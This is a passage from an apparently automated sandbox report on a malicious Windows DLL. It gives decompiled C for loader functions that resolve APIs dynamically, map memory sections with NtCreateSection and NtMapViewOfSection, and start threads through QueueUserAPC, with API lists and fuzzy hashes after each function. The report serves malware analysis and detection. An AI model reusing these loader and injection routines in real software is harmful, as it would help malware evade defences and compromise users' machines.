                                                                                                                											 *_t68 = _t59 - 0x63699bc3;
                                                                                                                										}
                                                                                                                										 *_v16 = _t55;
                                                                                                                										_t58 = 0x725990f8 + _t59 * 4;
                                                                                                                										_t73 = _t73 + _t58;
                                                                                                                										_t32 =  &_v16;
                                                                                                                										 *_t32 = _v16 + _t58;
                                                                                                                										__eflags =  *_t32;
                                                                                                                										continue;
                                                                                                                									}
                                                                                                                									goto L23;
                                                                                                                								}
                                                                                                                							} else {
                                                                                                                								_t50 = _t61;
                                                                                                                								if(_t61 != 0) {
                                                                                                                									goto L6;
                                                                                                                								}
                                                                                                                							}
                                                                                                                							L23:
                                                                                                                							_v12 = _v12 + 0x14;
                                                                                                                							_t46 =  *((intOrPtr*)(_v12 + 0xc));
                                                                                                                							if(_t46 != 0) {
                                                                                                                								continue;
                                                                                                                							} else {
                                                                                                                							}
                                                                                                                							L26:
                                                                                                                							goto L27;
                                                                                                                						}
                                                                                                                						_t60 = _t59 + 0x9c9664bb;
                                                                                                                						__eflags = _t60;
                                                                                                                						_v20 = _t60;
                                                                                                                						goto L26;
                                                                                                                					}
                                                                                                                				}
                                                                                                                				L27:
                                                                                                                				return _v20;
                                                                                                                			}




























                                                                                                                0x6e1f1bac
                                                                                                                0x6e1f1bb5
                                                                                                                0x6e1f1bba
                                                                                                                0x6e1f1bc0
                                                                                                                0x6e1f1bc9
                                                                                                                0x6e1f1bcf
                                                                                                                0x6e1f1bd1
                                                                                                                0x6e1f1bd4
                                                                                                                0x6e1f1bd9
                                                                                                                0x6e1f1be0
                                                                                                                0x6e1f1be0
                                                                                                                0x6e1f1be4
                                                                                                                0x6e1f1bea
                                                                                                                0x6e1f1bef
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x6e1f1bf5
                                                                                                                0x6e1f1bff
                                                                                                                0x6e1f1c01
                                                                                                                0x6e1f1c04
                                                                                                                0x6e1f1c07
                                                                                                                0x6e1f1c0b
                                                                                                                0x6e1f1c13
                                                                                                                0x6e1f1c15
                                                                                                                0x6e1f1c18
                                                                                                                0x6e1f1c80
                                                                                                                0x6e1f1c80
                                                                                                                0x6e1f1c84
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x6e1f1c1d
                                                                                                                0x6e1f1c23
                                                                                                                0x6e1f1c25
                                                                                                                0x6e1f1c38
                                                                                                                0x6e1f1c3b
                                                                                                                0x6e1f1c3b
                                                                                                                0x6e1f1c3b
                                                                                                                0x6e1f1c3f
                                                                                                                0x6e1f1c27
                                                                                                                0x6e1f1c27
                                                                                                                0x6e1f1c2f
                                                                                                                0x6e1f1c31
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x6e1f1c31
                                                                                                                0x6e1f1c1f
                                                                                                                0x6e1f1c1f
                                                                                                                0x6e1f1c33
                                                                                                                0x6e1f1c33
                                                                                                                0x6e1f1c33
                                                                                                                0x6e1f1c42
                                                                                                                0x6e1f1c45
                                                                                                                0x6e1f1c47
                                                                                                                0x6e1f1c4e
                                                                                                                0x6e1f1c49
                                                                                                                0x6e1f1c49
                                                                                                                0x6e1f1c49
                                                                                                                0x6e1f1c56
                                                                                                                0x6e1f1c5c
                                                                                                                0x6e1f1c5e
                                                                                                                0x6e1f1c8e
                                                                                                                0x6e1f1c60
                                                                                                                0x6e1f1c60
                                                                                                                0x6e1f1c63
                                                                                                                0x6e1f1c65
                                                                                                                0x6e1f1c6d
                                                                                                                0x6e1f1c6d
                                                                                                                0x6e1f1c72
                                                                                                                0x6e1f1c74
                                                                                                                0x6e1f1c7b
                                                                                                                0x6e1f1c7d
                                                                                                                0x6e1f1c7d
                                                                                                                0x6e1f1c7d
                                                                                                                0x00000000
                                                                                                                0x6e1f1c7d
                                                                                                                0x00000000
                                                                                                                0x6e1f1c5e
                                                                                                                0x6e1f1c0d
                                                                                                                0x6e1f1c0d
                                                                                                                0x6e1f1c11
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x6e1f1c11
                                                                                                                0x6e1f1c91
                                                                                                                0x6e1f1c91
                                                                                                                0x6e1f1c98
                                                                                                                0x6e1f1c9d
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x6e1f1ca3
                                                                                                                0x6e1f1cae
                                                                                                                0x00000000
                                                                                                                0x6e1f1cae
                                                                                                                0x6e1f1ca5
                                                                                                                0x6e1f1ca5
                                                                                                                0x6e1f1cab
                                                                                                                0x00000000
                                                                                                                0x6e1f1cab
                                                                                                                0x6e1f1bd9
                                                                                                                0x6e1f1caf
                                                                                                                0x6e1f1cb4

                                                                                                                APIs
                                                                                                                • LoadLibraryA.KERNELBASE(?,?,00000000,?,?), ref: 6E1F1BE4
                                                                                                                • GetProcAddress.KERNEL32(?,00000000), ref: 6E1F1C56
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.492699725.000000006E1F1000.00000020.00020000.sdmp, Offset: 6E1F0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.492671611.000000006E1F0000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.492733821.000000006E1F3000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.492766888.000000006E1F5000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.492808881.000000006E1F6000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: AddressLibraryLoadProc
                                                                                                                • String ID:
                                                                                                                • API String ID: 2574300362-0
                                                                                                                • Opcode ID: d2aafd8585bf9c9d48add595451825aa6c3d154cb38d96f00be3f0c224b0b14a
                                                                                                                • Instruction ID: d0bf840a3467e20b6f62afd3030980eae8a15a2e59d563eabb9382c24ecb00ba
                                                                                                                • Opcode Fuzzy Hash: d2aafd8585bf9c9d48add595451825aa6c3d154cb38d96f00be3f0c224b0b14a
                                                                                                                • Instruction Fuzzy Hash: BE315DB1B0421ADFDB44CF99C890AADB7F5BF15310FA14069D851E7241E770DA86EB90
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 68%
                                                                                                                			E6E1F1A44(void** __esi, PVOID* _a4) {
                                                                                                                				long _v8;
                                                                                                                				void* _v12;
                                                                                                                				void* _v16;
                                                                                                                				long _t13;
                                                                                                                
                                                                                                                				_v16 = 0;
                                                                                                                				asm("stosd");
                                                                                                                				_v8 = 0;
                                                                                                                				_t13 = NtMapViewOfSection( *__esi, 0xffffffff, _a4, 0, 0,  &_v16,  &_v8, 2, 0, __esi[2]);
                                                                                                                				if(_t13 < 0) {
                                                                                                                					_push(_t13);
                                                                                                                					return __esi[6]();
                                                                                                                				}
                                                                                                                				return 0;
                                                                                                                			}







                                                                                                                0x6e1f1a56
                                                                                                                0x6e1f1a5c
                                                                                                                0x6e1f1a6a
                                                                                                                0x6e1f1a71
                                                                                                                0x6e1f1a76
                                                                                                                0x6e1f1a7c
                                                                                                                0x00000000
                                                                                                                0x6e1f1a7d
                                                                                                                0x00000000

                                                                                                                APIs
                                                                                                                • NtMapViewOfSection.NTDLL(00000000,000000FF,?,00000000,00000000,?,6E1F1A08,00000002,00000000,?,?,00000000,?,?,6E1F1A08,00000002), ref: 6E1F1A71
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.492699725.000000006E1F1000.00000020.00020000.sdmp, Offset: 6E1F0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.492671611.000000006E1F0000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.492733821.000000006E1F3000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.492766888.000000006E1F5000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.492808881.000000006E1F6000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: SectionView
                                                                                                                • String ID:
                                                                                                                • API String ID: 1323581903-0
                                                                                                                • Opcode ID: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
                                                                                                                • Instruction ID: b309d729e885ca2fd2a038ef3d8cb5a9684487045621024fa797228ddaba49b9
                                                                                                                • Opcode Fuzzy Hash: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
                                                                                                                • Instruction Fuzzy Hash: 2BF082B5A0020CFFEB119FA5CC84C9FBBFCEB44394B104939F152E1090D2309E489A60
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 79%
                                                                                                                			E6E1F1456(char _a4) {
                                                                                                                				long _v8;
                                                                                                                				struct _SYSTEMTIME _v24;
                                                                                                                				char _v48;
                                                                                                                				void* __edi;
                                                                                                                				long _t20;
                                                                                                                				int _t22;
                                                                                                                				long _t25;
                                                                                                                				long _t26;
                                                                                                                				long _t30;
                                                                                                                				void* _t36;
                                                                                                                				intOrPtr _t38;
                                                                                                                				intOrPtr _t43;
                                                                                                                				signed int _t44;
                                                                                                                				void* _t48;
                                                                                                                				signed int _t51;
                                                                                                                				void* _t54;
                                                                                                                				intOrPtr* _t55;
                                                                                                                
                                                                                                                				_t20 = E6E1F1F0E();
                                                                                                                				_v8 = _t20;
                                                                                                                				if(_t20 != 0) {
                                                                                                                					return _t20;
                                                                                                                				}
                                                                                                                				do {
                                                                                                                					GetSystemTime( &_v24);
                                                                                                                					_t22 = SwitchToThread();
                                                                                                                					asm("cdq");
                                                                                                                					_t44 = 9;
                                                                                                                					_t51 = _t22 + (_v24.wMilliseconds & 0x0000ffff) % _t44;
                                                                                                                					_t25 = E6E1F1717(0, _t51); // executed
                                                                                                                					_v8 = _t25;
                                                                                                                					Sleep(_t51 << 5); // executed
                                                                                                                					_t26 = _v8;
                                                                                                                				} while (_t26 == 0xc);
                                                                                                                				if(_t26 != 0) {
                                                                                                                					L18:
                                                                                                                					return _t26;
                                                                                                                				}
                                                                                                                				if(_a4 != 0) {
                                                                                                                					L11:
                                                                                                                					_push(0);
                                                                                                                					_t54 = E6E1F155C(E6E1F1E55,  &_v48);
                                                                                                                					if(_t54 == 0) {
                                                                                                                						_v8 = GetLastError();
                                                                                                                					} else {
                                                                                                                						_t30 = WaitForSingleObject(_t54, 0xffffffff);
                                                                                                                						_v8 = _t30;
                                                                                                                						if(_t30 == 0) {
                                                                                                                							GetExitCodeThread(_t54,  &_v8);
                                                                                                                						}
                                                                                                                						CloseHandle(_t54);
                                                                                                                					}
                                                                                                                					_t26 = _v8;
                                                                                                                					if(_t26 == 0xffffffff) {
                                                                                                                						_t26 = GetLastError();
                                                                                                                					}
                                                                                                                					goto L18;
                                                                                                                				}
                                                                                                                				if(E6E1F1F87(_t44,  &_a4) != 0) {
                                                                                                                					 *0x6e1f4138 = 0;
                                                                                                                					goto L11;
                                                                                                                				}
                                                                                                                				_t43 = _a4;
                                                                                                                				_t55 = __imp__GetLongPathNameW;
                                                                                                                				_t36 =  *_t55(_t43, 0, 0); // executed
                                                                                                                				_t48 = _t36;
                                                                                                                				if(_t48 == 0) {
                                                                                                                					L9:
                                                                                                                					 *0x6e1f4138 = _t43;
                                                                                                                					goto L11;
                                                                                                                				}
                                                                                                                				_t14 = _t48 + 2; // 0x2
                                                                                                                				_t38 = E6E1F2009(_t48 + _t14);
                                                                                                                				 *0x6e1f4138 = _t38;
                                                                                                                				if(_t38 == 0) {
                                                                                                                					goto L9;
                                                                                                                				}
                                                                                                                				 *_t55(_t43, _t38, _t48); // executed
                                                                                                                				E6E1F201E(_t43);
                                                                                                                				goto L11;
                                                                                                                			}




















                                                                                                                0x6e1f145d
                                                                                                                0x6e1f1464
                                                                                                                0x6e1f1469
                                                                                                                0x6e1f1559
                                                                                                                0x6e1f1559
                                                                                                                0x6e1f1470
                                                                                                                0x6e1f1474
                                                                                                                0x6e1f147a
                                                                                                                0x6e1f1488
                                                                                                                0x6e1f1489
                                                                                                                0x6e1f148c
                                                                                                                0x6e1f148f
                                                                                                                0x6e1f1498
                                                                                                                0x6e1f149b
                                                                                                                0x6e1f14a1
                                                                                                                0x6e1f14a4
                                                                                                                0x6e1f14ab
                                                                                                                0x6e1f1556
                                                                                                                0x00000000
                                                                                                                0x6e1f1556
                                                                                                                0x6e1f14b5
                                                                                                                0x6e1f1506
                                                                                                                0x6e1f1506
                                                                                                                0x6e1f151c
                                                                                                                0x6e1f1521
                                                                                                                0x6e1f1549
                                                                                                                0x6e1f1523
                                                                                                                0x6e1f1526
                                                                                                                0x6e1f152c
                                                                                                                0x6e1f1531
                                                                                                                0x6e1f1538
                                                                                                                0x6e1f1538
                                                                                                                0x6e1f153f
                                                                                                                0x6e1f153f
                                                                                                                0x6e1f154c
                                                                                                                0x6e1f1552
                                                                                                                0x6e1f1554
                                                                                                                0x6e1f1554
                                                                                                                0x00000000
                                                                                                                0x6e1f1552
                                                                                                                0x6e1f14c2
                                                                                                                0x6e1f1500
                                                                                                                0x00000000
                                                                                                                0x6e1f1500
                                                                                                                0x6e1f14c4
                                                                                                                0x6e1f14c7
                                                                                                                0x6e1f14d0
                                                                                                                0x6e1f14d2
                                                                                                                0x6e1f14d6
                                                                                                                0x6e1f14f8
                                                                                                                0x6e1f14f8
                                                                                                                0x00000000
                                                                                                                0x6e1f14f8
                                                                                                                0x6e1f14d8
                                                                                                                0x6e1f14dd
                                                                                                                0x6e1f14e2
                                                                                                                0x6e1f14e9
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x6e1f14ee
                                                                                                                0x6e1f14f1
                                                                                                                0x00000000

                                                                                                                APIs
                                                                                                                  • Part of subcall function 6E1F1F0E: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,6E1F1462,74B063F0), ref: 6E1F1F1D
                                                                                                                  • Part of subcall function 6E1F1F0E: GetVersion.KERNEL32 ref: 6E1F1F2C
                                                                                                                  • Part of subcall function 6E1F1F0E: GetCurrentProcessId.KERNEL32 ref: 6E1F1F48
                                                                                                                  • Part of subcall function 6E1F1F0E: OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 6E1F1F61
                                                                                                                • GetSystemTime.KERNEL32(?,00000000,74B063F0), ref: 6E1F1474
                                                                                                                • SwitchToThread.KERNEL32 ref: 6E1F147A
                                                                                                                  • Part of subcall function 6E1F1717: VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004,?,?,?,00000000), ref: 6E1F176D
                                                                                                                  • Part of subcall function 6E1F1717: memcpy.NTDLL(?,?,?,?,?,?,00000000), ref: 6E1F1833
                                                                                                                • Sleep.KERNELBASE(00000000,00000000), ref: 6E1F149B
                                                                                                                • GetLongPathNameW.KERNELBASE(?,00000000,00000000), ref: 6E1F14D0
                                                                                                                • GetLongPathNameW.KERNELBASE(?,00000000,00000000), ref: 6E1F14EE
                                                                                                                • WaitForSingleObject.KERNEL32(00000000,000000FF,?,00000000), ref: 6E1F1526
                                                                                                                • GetExitCodeThread.KERNEL32(00000000,?), ref: 6E1F1538
                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 6E1F153F
                                                                                                                • GetLastError.KERNEL32(?,00000000), ref: 6E1F1547
                                                                                                                • GetLastError.KERNEL32 ref: 6E1F1554
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.492699725.000000006E1F1000.00000020.00020000.sdmp, Offset: 6E1F0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.492671611.000000006E1F0000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.492733821.000000006E1F3000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.492766888.000000006E1F5000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.492808881.000000006E1F6000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: ErrorLastLongNamePathProcessThread$AllocCloseCodeCreateCurrentEventExitHandleObjectOpenSingleSleepSwitchSystemTimeVersionVirtualWaitmemcpy
                                                                                                                • String ID:
                                                                                                                • API String ID: 1962885430-0
                                                                                                                • Opcode ID: 9dd13fe30c2fff2d6a01356df4afe2b07a74786f32ae7ae02da0e2288041ae8f
                                                                                                                • Instruction ID: 6e2b89b3a155a1fbb4bfbbe08ad96213a5056964876ad6cbefb0b1858b6bdd4a
                                                                                                                • Opcode Fuzzy Hash: 9dd13fe30c2fff2d6a01356df4afe2b07a74786f32ae7ae02da0e2288041ae8f
                                                                                                                • Instruction Fuzzy Hash: 3131A4F2A00515EBCB01DBE59C4899E77FC9F86361B214512E916D3101E734CA87FBE1
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 100%
                                                                                                                			E6E1F1146(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
                                                                                                                				intOrPtr _v8;
                                                                                                                				_Unknown_base(*)()* _t29;
                                                                                                                				_Unknown_base(*)()* _t33;
                                                                                                                				_Unknown_base(*)()* _t36;
                                                                                                                				_Unknown_base(*)()* _t39;
                                                                                                                				_Unknown_base(*)()* _t42;
                                                                                                                				intOrPtr _t46;
                                                                                                                				struct HINSTANCE__* _t50;
                                                                                                                				intOrPtr _t56;
                                                                                                                
                                                                                                                				_t56 = E6E1F2009(0x20);
                                                                                                                				if(_t56 == 0) {
                                                                                                                					_v8 = 8;
                                                                                                                				} else {
                                                                                                                					_t50 = GetModuleHandleA( *0x6e1f4144 + 0x6e1f5014);
                                                                                                                					_v8 = 0x7f;
                                                                                                                					_t29 = GetProcAddress(_t50,  *0x6e1f4144 + 0x6e1f5151);
                                                                                                                					 *(_t56 + 0xc) = _t29;
                                                                                                                					if(_t29 == 0) {
                                                                                                                						L8:
                                                                                                                						E6E1F201E(_t56);
                                                                                                                					} else {
                                                                                                                						_t33 = GetProcAddress(_t50,  *0x6e1f4144 + 0x6e1f5161);
                                                                                                                						 *(_t56 + 0x10) = _t33;
                                                                                                                						if(_t33 == 0) {
                                                                                                                							goto L8;
                                                                                                                						} else {
                                                                                                                							_t36 = GetProcAddress(_t50,  *0x6e1f4144 + 0x6e1f5174);
                                                                                                                							 *(_t56 + 0x14) = _t36;
                                                                                                                							if(_t36 == 0) {
                                                                                                                								goto L8;
                                                                                                                							} else {
                                                                                                                								_t39 = GetProcAddress(_t50,  *0x6e1f4144 + 0x6e1f5189);
                                                                                                                								 *(_t56 + 0x18) = _t39;
                                                                                                                								if(_t39 == 0) {
                                                                                                                									goto L8;
                                                                                                                								} else {
                                                                                                                									_t42 = GetProcAddress(_t50,  *0x6e1f4144 + 0x6e1f519f);
                                                                                                                									 *(_t56 + 0x1c) = _t42;
                                                                                                                									if(_t42 == 0) {
                                                                                                                										goto L8;
                                                                                                                									} else {
                                                                                                                										 *((intOrPtr*)(_t56 + 8)) = _a8;
                                                                                                                										 *((intOrPtr*)(_t56 + 4)) = _a4;
                                                                                                                										_t46 = E6E1F1996(_t56, _a12); // executed
                                                                                                                										_v8 = _t46;
                                                                                                                										if(_t46 != 0) {
                                                                                                                											goto L8;
                                                                                                                										} else {
                                                                                                                											 *_a16 = _t56;
                                                                                                                										}
                                                                                                                									}
                                                                                                                								}
                                                                                                                							}
                                                                                                                						}
                                                                                                                					}
                                                                                                                				}
                                                                                                                				return _v8;
                                                                                                                			}












                                                                                                                0x6e1f1154
                                                                                                                0x6e1f1158
                                                                                                                0x6e1f1219
                                                                                                                0x6e1f115e
                                                                                                                0x6e1f1176
                                                                                                                0x6e1f1185
                                                                                                                0x6e1f118c
                                                                                                                0x6e1f118e
                                                                                                                0x6e1f1193
                                                                                                                0x6e1f1211
                                                                                                                0x6e1f1212
                                                                                                                0x6e1f1195
                                                                                                                0x6e1f11a2
                                                                                                                0x6e1f11a4
                                                                                                                0x6e1f11a9
                                                                                                                0x00000000
                                                                                                                0x6e1f11ab
                                                                                                                0x6e1f11b8
                                                                                                                0x6e1f11ba
                                                                                                                0x6e1f11bf
                                                                                                                0x00000000
                                                                                                                0x6e1f11c1
                                                                                                                0x6e1f11ce
                                                                                                                0x6e1f11d0
                                                                                                                0x6e1f11d5
                                                                                                                0x00000000
                                                                                                                0x6e1f11d7
                                                                                                                0x6e1f11e4
                                                                                                                0x6e1f11e6
                                                                                                                0x6e1f11eb
                                                                                                                0x00000000
                                                                                                                0x6e1f11ed
                                                                                                                0x6e1f11f3
                                                                                                                0x6e1f11f9
                                                                                                                0x6e1f11fe
                                                                                                                0x6e1f1203
                                                                                                                0x6e1f1208
                                                                                                                0x00000000
                                                                                                                0x6e1f120a
                                                                                                                0x6e1f120d
                                                                                                                0x6e1f120d
                                                                                                                0x6e1f1208
                                                                                                                0x6e1f11eb
                                                                                                                0x6e1f11d5
                                                                                                                0x6e1f11bf
                                                                                                                0x6e1f11a9
                                                                                                                0x6e1f1193
                                                                                                                0x6e1f1227

                                                                                                                APIs
                                                                                                                  • Part of subcall function 6E1F2009: HeapAlloc.KERNEL32(00000000,?,6E1F1FA5,00000208,00000000,00000000,?,?,?,6E1F14C0,?), ref: 6E1F2015
                                                                                                                • GetModuleHandleA.KERNEL32(?,00000020,?,?,?,?,?,6E1F1670,?,?,?,?,?,00000002,?,?), ref: 6E1F116A
                                                                                                                • GetProcAddress.KERNEL32(00000000,?), ref: 6E1F118C
                                                                                                                • GetProcAddress.KERNEL32(00000000,?), ref: 6E1F11A2
                                                                                                                • GetProcAddress.KERNEL32(00000000,?), ref: 6E1F11B8
                                                                                                                • GetProcAddress.KERNEL32(00000000,?), ref: 6E1F11CE
                                                                                                                • GetProcAddress.KERNEL32(00000000,?), ref: 6E1F11E4
                                                                                                                  • Part of subcall function 6E1F1996: NtCreateSection.NTDLL(?,000F001F,?,?,?,08000000,00000000,74B04EE0,00000000,00000000,?), ref: 6E1F19F3
                                                                                                                  • Part of subcall function 6E1F1996: memset.NTDLL ref: 6E1F1A15
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.492699725.000000006E1F1000.00000020.00020000.sdmp, Offset: 6E1F0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.492671611.000000006E1F0000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.492733821.000000006E1F3000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.492766888.000000006E1F5000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.492808881.000000006E1F6000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: AddressProc$AllocCreateHandleHeapModuleSectionmemset
                                                                                                                • String ID:
                                                                                                                • API String ID: 1632424568-0
                                                                                                                • Opcode ID: 642e2a92653ba6aacc102a72b74c25806c86572ed8847b4b73d740dff70185d9
                                                                                                                • Instruction ID: 9b82a9d525289ade194d177f8b0889dde4793554265f76736586c1f05057a469
                                                                                                                • Opcode Fuzzy Hash: 642e2a92653ba6aacc102a72b74c25806c86572ed8847b4b73d740dff70185d9
                                                                                                                • Instruction Fuzzy Hash: AD214DB1604A0BDFDB10DFF9D940A5A77ECAF553047218426E845E7211E770E946ABE0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • std::_Lockit::_Lockit.LIBCPMT ref: 6E21304A
                                                                                                                  • Part of subcall function 6E219205: __lock.LIBCMT ref: 6E219216
                                                                                                                • int.LIBCPMTD ref: 6E213063
                                                                                                                  • Part of subcall function 6E214660: std::_Lockit::_Lockit.LIBCPMT ref: 6E214676
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.492865179.000000006E200000.00000020.00020000.sdmp, Offset: 6E200000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID: LockitLockit::_std::_$__lock
                                                                                                                • String ID:
                                                                                                                • API String ID: 172949856-0
                                                                                                                • Opcode ID: 3c05249b15fedf4d7580a020de3a2450b1e7498a24adcdc87a336de3d02c1699
                                                                                                                • Instruction ID: f2d0f907327948fa3ce1da43a3092cfdb84b46c2123335d3d46d6f2565de3264
                                                                                                                • Opcode Fuzzy Hash: 3c05249b15fedf4d7580a020de3a2450b1e7498a24adcdc87a336de3d02c1699
                                                                                                                • Instruction Fuzzy Hash: C431F6B5D1821D9FCB08CFE4C955AEEB7FAFB48314F104629E525A7390DB346A04CBA1
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 86%
                                                                                                                			_entry_(void* __ecx, intOrPtr _a4, char _a8, intOrPtr _a12) {
                                                                                                                				long _v8;
                                                                                                                				void* __edi;
                                                                                                                				void* __esi;
                                                                                                                				void* __ebp;
                                                                                                                				char _t9;
                                                                                                                				void* _t10;
                                                                                                                				void* _t18;
                                                                                                                				void* _t23;
                                                                                                                				void* _t36;
                                                                                                                
                                                                                                                				_push(__ecx);
                                                                                                                				_t9 = _a8;
                                                                                                                				_v8 = 1;
                                                                                                                				if(_t9 == 0) {
                                                                                                                					_t10 = InterlockedDecrement(0x6e1f4108);
                                                                                                                					__eflags = _t10;
                                                                                                                					if(_t10 == 0) {
                                                                                                                						__eflags =  *0x6e1f410c;
                                                                                                                						if( *0x6e1f410c != 0) {
                                                                                                                							_t36 = 0x2328;
                                                                                                                							while(1) {
                                                                                                                								SleepEx(0x64, 1);
                                                                                                                								__eflags =  *0x6e1f4118;
                                                                                                                								if( *0x6e1f4118 == 0) {
                                                                                                                									break;
                                                                                                                								}
                                                                                                                								_t36 = _t36 - 0x64;
                                                                                                                								__eflags = _t36;
                                                                                                                								if(_t36 > 0) {
                                                                                                                									continue;
                                                                                                                								}
                                                                                                                								break;
                                                                                                                							}
                                                                                                                							CloseHandle( *0x6e1f410c);
                                                                                                                						}
                                                                                                                						HeapDestroy( *0x6e1f4110);
                                                                                                                					}
                                                                                                                				} else {
                                                                                                                					if(_t9 == 1 && InterlockedIncrement(0x6e1f4108) == 1) {
                                                                                                                						_t18 = HeapCreate(0, 0x400000, 0); // executed
                                                                                                                						 *0x6e1f4110 = _t18;
                                                                                                                						_t41 = _t18;
                                                                                                                						if(_t18 == 0) {
                                                                                                                							L6:
                                                                                                                							_v8 = 0;
                                                                                                                						} else {
                                                                                                                							 *0x6e1f4130 = _a4;
                                                                                                                							asm("lock xadd [eax], edi");
                                                                                                                							_push( &_a8);
                                                                                                                							_t23 = E6E1F155C(E6E1F15EA, E6E1F1A86(_a12, 1, 0x6e1f4118, _t41));
                                                                                                                							 *0x6e1f410c = _t23;
                                                                                                                							if(_t23 == 0) {
                                                                                                                								asm("lock xadd [esi], eax");
                                                                                                                								goto L6;
                                                                                                                							}
                                                                                                                						}
                                                                                                                					}
                                                                                                                				}
                                                                                                                				return _v8;
                                                                                                                			}












                                                                                                                0x6e1f1d4e
                                                                                                                0x6e1f1d5a
                                                                                                                0x6e1f1d5c
                                                                                                                0x6e1f1d5f
                                                                                                                0x6e1f1dd5
                                                                                                                0x6e1f1ddb
                                                                                                                0x6e1f1ddd
                                                                                                                0x6e1f1ddf
                                                                                                                0x6e1f1de5
                                                                                                                0x6e1f1de7
                                                                                                                0x6e1f1dec
                                                                                                                0x6e1f1def
                                                                                                                0x6e1f1dfa
                                                                                                                0x6e1f1dfc
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x6e1f1dfe
                                                                                                                0x6e1f1e01
                                                                                                                0x6e1f1e03
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x6e1f1e03
                                                                                                                0x6e1f1e0b
                                                                                                                0x6e1f1e0b
                                                                                                                0x6e1f1e17
                                                                                                                0x6e1f1e17
                                                                                                                0x6e1f1d61
                                                                                                                0x6e1f1d62
                                                                                                                0x6e1f1d82
                                                                                                                0x6e1f1d88
                                                                                                                0x6e1f1d8d
                                                                                                                0x6e1f1d8f
                                                                                                                0x6e1f1dcb
                                                                                                                0x6e1f1dcb
                                                                                                                0x6e1f1d91
                                                                                                                0x6e1f1d99
                                                                                                                0x6e1f1da0
                                                                                                                0x6e1f1daa
                                                                                                                0x6e1f1db6
                                                                                                                0x6e1f1dbb
                                                                                                                0x6e1f1dc2
                                                                                                                0x6e1f1dc7
                                                                                                                0x00000000
                                                                                                                0x6e1f1dc7
                                                                                                                0x6e1f1dc2
                                                                                                                0x6e1f1d8f
                                                                                                                0x6e1f1d62
                                                                                                                0x6e1f1e24

                                                                                                                APIs
                                                                                                                • InterlockedIncrement.KERNEL32(6E1F4108), ref: 6E1F1D6D
                                                                                                                • HeapCreate.KERNELBASE(00000000,00400000,00000000), ref: 6E1F1D82
                                                                                                                  • Part of subcall function 6E1F155C: CreateThread.KERNELBASE ref: 6E1F1573
                                                                                                                  • Part of subcall function 6E1F155C: QueueUserAPC.KERNELBASE(?,00000000,?), ref: 6E1F1588
                                                                                                                  • Part of subcall function 6E1F155C: GetLastError.KERNEL32(00000000), ref: 6E1F1593
                                                                                                                  • Part of subcall function 6E1F155C: TerminateThread.KERNEL32(00000000,00000000), ref: 6E1F159D
                                                                                                                  • Part of subcall function 6E1F155C: CloseHandle.KERNEL32(00000000), ref: 6E1F15A4
                                                                                                                  • Part of subcall function 6E1F155C: SetLastError.KERNEL32(00000000), ref: 6E1F15AD
                                                                                                                • InterlockedDecrement.KERNEL32(6E1F4108), ref: 6E1F1DD5
                                                                                                                • SleepEx.KERNEL32(00000064,00000001), ref: 6E1F1DEF
                                                                                                                • CloseHandle.KERNEL32 ref: 6E1F1E0B
                                                                                                                • HeapDestroy.KERNEL32 ref: 6E1F1E17
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.492699725.000000006E1F1000.00000020.00020000.sdmp, Offset: 6E1F0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.492671611.000000006E1F0000.00000002.00020000.sdmp Download File
